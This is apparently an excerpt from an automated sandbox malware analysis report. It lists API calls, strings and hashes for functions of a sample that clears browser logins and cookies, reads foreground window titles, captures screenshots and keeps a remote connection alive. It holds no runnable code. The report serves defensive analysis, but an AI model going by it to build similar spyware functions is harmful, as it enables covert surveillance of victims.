                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                    • String ID:
                                                                    • API String ID: 2652629310-0
                                                                    • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                    • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                    • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                    • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                    APIs
                                                                    Strings
                                                                    • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                                    • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                    • API String ID: 3472027048-1236744412
                                                                    • Opcode ID: 8cace6e0e62c26d397a9231955a18aa10ccfcc3ca9fba08ddd567ef7e769b7aa
                                                                    • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                                    • Opcode Fuzzy Hash: 8cace6e0e62c26d397a9231955a18aa10ccfcc3ca9fba08ddd567ef7e769b7aa
                                                                    • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                                    APIs
                                                                      • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                                      • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                                      • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                    • Sleep.KERNEL32(00000BB8), ref: 0041277A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQuerySleepValue
                                                                    • String ID: 0%s$exepath$hdF
                                                                    • API String ID: 4119054056-3548984030
                                                                    • Opcode ID: abf20036ad70d98174a07eb652c7711c4b2f7adaf8a1d534f2fe302cffeed402
                                                                    • Instruction ID: f3cf03c5a64ef847c6da3637c810c9cb64e8e240b2c65477c235684d5dc29c85
                                                                    • Opcode Fuzzy Hash: abf20036ad70d98174a07eb652c7711c4b2f7adaf8a1d534f2fe302cffeed402
                                                                    • Instruction Fuzzy Hash: B52148A0B0030427DA00B7366D46EBF724E8B84318F40443FB916E72D3EEBC9C48426D
                                                                    APIs
                                                                      • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                                                      • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                                                      • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                                                    • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                                    • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$SleepText$ForegroundLength
                                                                    • String ID: [ $ ]
                                                                    • API String ID: 3309952895-93608704
                                                                    • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                                                    • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                                    • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                                                    • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: SystemTimes$Sleep__aulldiv
                                                                    • String ID:
                                                                    • API String ID: 188215759-0
                                                                    • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                    • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                                                    • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                    • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                    • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                                                    • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                    • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                    • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                                                    • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                    • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                                    • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                    • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                                    • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                    • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                    • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                    • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                    • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                    • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                    APIs
                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                                      • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                                    • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                    • String ID:
                                                                    • API String ID: 2633735394-0
                                                                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                    • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                    • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                                                    • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                                                    • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                                                    • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MetricsSystem
                                                                    • String ID:
                                                                    • API String ID: 4116985748-0
                                                                    • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                    • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                                    • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                    • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                                    APIs
                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                                      • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                    • String ID:
                                                                    • API String ID: 1761009282-0
                                                                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                    • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                                                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                    • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                                                    APIs
                                                                    • _free.LIBCMT ref: 1000655C
                                                                      • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                      • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                      • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                    • String ID: *?$.
                                                                    • API String ID: 2667617558-3972193922
                                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                    • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                    • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                    APIs
                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                                                      • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                    • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                                                      • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                      • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                    • String ID: image/jpeg
                                                                    • API String ID: 1291196975-3785015651
                                                                    • Opcode ID: d9a19672ec4dc75711255ce94c2c2311e4e29857de9186f34d814f6d2a4cbe43
                                                                    • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                                                    • Opcode Fuzzy Hash: d9a19672ec4dc75711255ce94c2c2311e4e29857de9186f34d814f6d2a4cbe43
                                                                    • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                                                    APIs
                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 0-711371036
                                                                    • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                    • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                                                    • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                    • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                                                    APIs
                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                                                      • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                                                      • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                      • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                    • String ID: image/png
                                                                    • API String ID: 1291196975-2966254431
                                                                    • Opcode ID: d4f259a593197f1d9dbe7f79535cfb99d89987488e7eb69950e532603a38181c
                                                                    • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                                                    • Opcode Fuzzy Hash: d4f259a593197f1d9dbe7f79535cfb99d89987488e7eb69950e532603a38181c
                                                                    • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                                    Strings
                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                    Memory Dump Source
